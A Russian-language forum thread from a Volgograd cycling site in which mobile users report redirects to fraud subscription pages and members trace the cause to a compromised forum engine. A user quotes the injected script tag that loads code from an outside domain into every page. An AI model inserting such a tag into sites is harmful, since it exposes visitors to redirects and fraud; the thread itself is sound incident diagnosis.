AVRORA Опубликовано 24 сентября, 2015 Поделиться Опубликовано 24 сентября, 2015 То же самое. Мегафон. https://vk.com/avrorasclub Ссылка на комментарий Поделиться на другие сайты Поделиться
027 Опубликовано 24 сентября, 2015 Поделиться Опубликовано 24 сентября, 2015 На МТС такого не наблюдаю. Вообще говоря, за такие дела опсосов надо наказывать. Никогда ничего не трогай на моей лодке! Ссылка на комментарий Поделиться на другие сайты Поделиться
andy Опубликовано 24 сентября, 2015 Поделиться Опубликовано 24 сентября, 2015 дело не в опсосах, на хосте шел залит, ну или через соседей добрались. Ссылка на комментарий Поделиться на другие сайты Поделиться
Гость ВЕЮ Опубликовано 24 сентября, 2015 Поделиться Опубликовано 24 сентября, 2015 Все норм на мтс Ссылка на комментарий Поделиться на другие сайты Поделиться
andy Опубликовано 24 сентября, 2015 Поделиться Опубликовано 24 сентября, 2015 не все опсосы одинаковы полезны в плане монетизации Ссылка на комментарий Поделиться на другие сайты Поделиться
027 Опубликовано 24 сентября, 2015 Поделиться Опубликовано 24 сентября, 2015 (изменено) шел залитИзбирательный такой шелл только на двух мобильных провов? Изменено 24 сентября, 2015 пользователем 027 Никогда ничего не трогай на моей лодке! Ссылка на комментарий Поделиться на другие сайты Поделиться
incognito Опубликовано 24 сентября, 2015 Поделиться Опубликовано 24 сентября, 2015 Господа пострадавшие, вот вам отправная точка для дальнейших раздумий. На МТС такого не наблюдаюАналогично. Также, не наблюдают ещё четверо моих МТСнутых знакомых, которых попросил проверить вотпрямщас. дело не в опсосах, на хосте шел залит, ну или через соседей добралисьМимо. Skyrider 1 Ссылка на комментарий Поделиться на другие сайты Поделиться
Andrey_VLG Опубликовано 24 сентября, 2015 Поделиться Опубликовано 24 сентября, 2015 Мегафон, мобка, пичаль. Ссылка на комментарий Поделиться на другие сайты Поделиться
alex_47_2009 Опубликовано 25 сентября, 2015 Поделиться Опубликовано 25 сентября, 2015 (изменено) Теле2 - аналогично. Как отключить подписки понятно, но как попасть с мобильника на форум, вот вопрос?) Изменено 25 сентября, 2015 пользователем alex_47_2009 Ссылка на комментарий Поделиться на другие сайты Поделиться
Pazema Опубликовано 25 сентября, 2015 Поделиться Опубликовано 25 сентября, 2015 (изменено) @incognito, т.е теперь все абоненты. билайна. мегафона, теле2 зайти с мобильных устройств на форум не смогут, да это приличная часть аудитории данного форума + гости. Лично мне по вашей отправной точке не понятно где и как мне танцевать с бубном что бы без смены оператора на МТС нормально пользоваться форумом например в дороге. Изменено 25 сентября, 2015 пользователем Pazema Ссылка на комментарий Поделиться на другие сайты Поделиться
incognito Опубликовано 25 сентября, 2015 Поделиться Опубликовано 25 сентября, 2015 т.е теперь все абоненты. билайна. мегафона, теле2 зайти с мобильных устройств на форум не смогут, да это приличная часть аудитории данного форума + гости.Это печально. Что вы предлагаете сделать лично мне? Тем, у кого есть такие проблемы, могу лишь посоветовать следующее:1. Разобраться с подписками.2. Тщательно выкурить вот эту тему.Сделать это за вас я не могу. Pazema 1 Ссылка на комментарий Поделиться на другие сайты Поделиться
Pazema Опубликовано 25 сентября, 2015 Поделиться Опубликовано 25 сентября, 2015 @incognito, Лично вам я ничего не предлагаю. просто факт массовой переадресации с форума на лицо и это не есть хорошо. Причем на все другие сайты заходит без проблем. это ситуация однозначно отпугнет новых посетителей фору что ни есть хорошо. XOkey 1 Ссылка на комментарий Поделиться на другие сайты Поделиться
Pazema Опубликовано 25 сентября, 2015 Поделиться Опубликовано 25 сентября, 2015 проблема наблюдается если сидишь с мобильного инета, если через вафлю то все норм. Значит проблема не в телефоне и не в браузере а в провайдере. Подписок у меня никаких нет, о чем узнал в личном кабинете билайна. на всякий случай сделал сбросил кеш браузера и все его настройки. не помогло. Если сделать мобилу как точку доступа подключится ноутом и зайти на форму то все норм переадресации нет. , AVRORA 1 Ссылка на комментарий Поделиться на другие сайты Поделиться
Olegator Опубликовано 25 сентября, 2015 Поделиться Опубликовано 25 сентября, 2015 (изменено) мегафон. подписок нет. редирект есть (да и вопрос почему это происходит именно при переходе на велофорум? при переходе на другие сайты такого не наблюдается. Изменено 25 сентября, 2015 пользователем Olegator AVRORA 1 Наше сообщество "ВелоРелакс Волгоград": vk.com/velorelaxvlg Специалист по недвижимости: покупка/продажа, сопровождение сделок Ссылка на комментарий Поделиться на другие сайты Поделиться
027 Опубликовано 25 сентября, 2015 Поделиться Опубликовано 25 сентября, 2015 Спроси у прова, какого хера он вообще вмешивается в твой трафик. Подтверждаю редирект на Теле2. Один и тот же двухсимочный смарт, на МТС нету, на Еле2 есть. Что вы предлагаете сделать лично мне?SSL?..Инкогнито, сделай для пробы простую статическую страничку в корне, типа test.html Pazema 1 Никогда ничего не трогай на моей лодке! Ссылка на комментарий Поделиться на другие сайты Поделиться
alex_47_2009 Опубликовано 25 сентября, 2015 Поделиться Опубликовано 25 сентября, 2015 (изменено) Тем, у кого есть такие проблемы, могу лишь посоветовать следующее: 1. Разобраться с подписками. 2. Тщательно выкурить вот эту тему.Девушка в офисе Теле2 зашла с мобилки и получила переадресацию... ОПСОС, вроде. взялся подумать над решением проблемы. Я, на всякий случай, подключил контентный личный счет. Теперь мошенники не имеют доступа к основному. Могу подписываться на что угодно Изменено 25 сентября, 2015 пользователем alex_47_2009 Ссылка на комментарий Поделиться на другие сайты Поделиться
incognito Опубликовано 25 сентября, 2015 Поделиться Опубликовано 25 сентября, 2015 Инкогнито, сделай для пробы простую статическую страничку в корне, типа test.htmlСделал в корне test.html Ссылка на комментарий Поделиться на другие сайты Поделиться
027 Опубликовано 25 сентября, 2015 Поделиться Опубликовано 25 сентября, 2015 (изменено) На тестовой редиректа нету. На движке есть. (Теле2)У тебя еще какие-то движки есть там? Вики там, или еще что. А лучше с нуля что-нить тестовое заинсталлить и права на запись порезать напрочь. Изменено 25 сентября, 2015 пользователем 027 Никогда ничего не трогай на моей лодке! Ссылка на комментарий Поделиться на другие сайты Поделиться
andy Опубликовано 25 сентября, 2015 Поделиться Опубликовано 25 сентября, 2015 в сурсе страниицых т.е сквозняком есть такое <script async src="http://shockwavepub.ru/802g"></script> причем я поискал в кеше гугла страницы форума за прошлые числа, нашел за 17.09, этого нет. я не знаю, может это какая то реклама, у меня броузер режет все, я рекламы не вижу. Ссылка на комментарий Поделиться на другие сайты Поделиться
incognito Опубликовано 25 сентября, 2015 Поделиться Опубликовано 25 сентября, 2015 Нет там больше никаких движков.Там еще один мой товарищ держит что_то, что высасывает каждую ночь какие-то исходники из гугла, и их компилит. Но высасывает из гугла, вроде со стороны ничего не сосет. И на каталог с форумом у него нет правов. И вообще. А из /forum/test.html будет редиректиться? Ссылка на комментарий Поделиться на другие сайты Поделиться
027 Опубликовано 25 сентября, 2015 Поделиться Опубликовано 25 сентября, 2015 Так поставь, и попробуем.Есть подозрение, что эту борду таки отымели.Также не вредно пройтись find'ом но недавно измененным файлам. Никогда ничего не трогай на моей лодке! Ссылка на комментарий Поделиться на другие сайты Поделиться
Olegator Опубликовано 25 сентября, 2015 Поделиться Опубликовано 25 сентября, 2015 у меня предложение. может быть есть смысл на платные ресурсы перейти. думаю что большая часть форумчан готова платить за комфорт по 50 руб в год. Наше сообщество "ВелоРелакс Волгоград": vk.com/velorelaxvlg Специалист по недвижимости: покупка/продажа, сопровождение сделок Ссылка на комментарий Поделиться на другие сайты Поделиться
andy Опубликовано 25 сентября, 2015 Поделиться Опубликовано 25 сентября, 2015 (изменено) тогда уж айболитом пройтись, неплохо находит всякий зловред https://revisium.com/ai/ Изменено 25 сентября, 2015 пользователем andy Ссылка на комментарий Поделиться на другие сайты Поделиться
027 Опубликовано 25 сентября, 2015 Поделиться Опубликовано 25 сентября, 2015 Какой еще айболит, о чем вы... Кстати вот, глянул с модема МТС на ББ хедеры и вижу вот такое: GET 404 text/html http://shockwavepub.ru/802g (Request-Line) GET /802g HTTP/1.1Host shockwavepub.ruUser-Agent Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:40.0) Gecko/20100101 Firefox/40.0Accept */*Accept-Language ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding gzip, deflateReferer http://www.velovolgograd.ru/forum/index.php?/topic/1482-nebolshie-zamechaniia-i-nabliudeniia-dopolneniia-p/page-13Ща с рабочего компа гляну. Никогда ничего не трогай на моей лодке! Ссылка на комментарий Поделиться на другие сайты Поделиться
incognito Опубликовано 25 сентября, 2015 Поделиться Опубликовано 25 сентября, 2015 А щас попробуйте кто-нибудь Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Для публикации сообщений создайте учётную запись или авторизуйтесь
Вы должны быть пользователем, чтобы оставить комментарий
Создать аккаунт
Зарегистрируйте новый аккаунт в нашем сообществе. Это очень просто!
Регистрация нового пользователяВойти
Уже есть аккаунт? Войти в систему.
Войти